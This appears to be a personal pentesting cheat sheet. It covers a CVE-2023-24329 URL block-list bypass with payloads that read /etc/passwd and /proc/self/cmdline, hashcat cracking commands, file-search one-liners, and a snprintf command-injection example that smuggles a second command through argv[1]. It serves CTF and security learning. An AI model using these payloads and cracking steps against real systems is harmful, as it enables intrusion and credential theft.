CVE-2023-24329

• Ref: https://github.com/JawadPy/CVE-2023-24329-Exploit

To bypass: simply put a space before the blocked domain

e.g given the following block list

blocked_list = [
    "http://example.com/",
    "http://example2.com/"
]

To bypass, the payload can be

"    http://example.com/"
"    file:///etc/passwd"
"    file:///proc/self/cmdline"
"    ftp://<username>:<password>@<domain-name>/<file-name>"

Generate RSA private key from OPENSSH private key

> ssh-keygen -p -N "" -m pem -f private.key
Enter old passphrase: <enter-passphrase>
Key has comment '<comment>'
Your identification has been saved with the new passphrase.

Cracking hashes

• Python Werkzeug SHA256 (HMAC-SHA256 (key = $salt))
• Ref: https://hashcat.net/wiki/doku.php?id=example_hashes

30120    Python Werkzeug SHA256 (HMAC-SHA256 (key = $salt))    sha256$70108387805$8b9472281c36c3a693703de0

To crack

> hashcat -m 30120 hash_file wordlist_file

• MD5 given partial plaintext Suppose there is a given md5 hash and some partially given plain text

> hashcat hash_file -a 3 -m 0 -1 ?l?u?d?s PLAINTEXT?1?1?1

Useful search method

• Find files modified since 2024-04-1 and exclude some paths

> find / -type f -newermt '2024-04-01' -not -path "/usr/*" -not -path "/sys/*" -not -path "/proc/*" -not -path "/run/*" -not -path "/boot/*" -not -path "/var/lib/*" -ls 2>/dev/null

• Find files owned by a user

> find / -type f -user <username> 2>/dev/null

• grep all files for keyword under a folder even if they are compressed

> zgrep -i keyword /file/path/*.gz

cmd injection

A safe use of snprintf

snprintf(buf, sizeof buf, "%s", argv[1]);

However, if the formatted string contains an os command, then argv[1] can be used for cmdi

snprintf(buf, sizeof(buf), "cmd -i %s", argv[1]);

# e.g argv[1]: file_path;<cmd>

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack